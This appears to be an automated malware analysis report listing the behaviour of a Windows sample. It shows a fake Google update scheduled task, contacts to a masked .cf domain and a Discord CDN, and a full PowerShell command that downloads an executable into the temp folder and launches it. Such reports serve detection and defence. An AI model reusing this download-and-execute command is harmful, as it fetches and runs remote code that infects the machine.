Technical Information
- <SYSTEM32>\tasks\googleupdatetaskmachineqc
- http://ur##66.cf/load as (join-path -path $env:temp -childpath loaddg9huo.exe
- <SYSTEM32>\conhost.exe
- %TEMP%\loaddg9huo.exe
- 'ur##66.cf':80
- 'ur##66.cf':443
- 'cd#.##scordapp.com':443
- http://ur##66.cf/LOAD
- 'ur##66.cf':443
- 'cd#.##scordapp.com':443
- DNS ASK ur##66.cf
- DNS ASK cd#.##scordapp.com
- '%TEMP%\loaddg9huo.exe'
- '%WINDIR%\syswow64\cmd.exe' /c powershell "(New-Object System.Net.WebClient).DownloadFile('http://ur##66.cf/LOAD', (Join-Path -Path $env:Temp -ChildPath 'LOADDg9HuO.exe'))" & powershell "Start-Process -FilePath (Join-Path...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'LOADDg9HuO.exe')"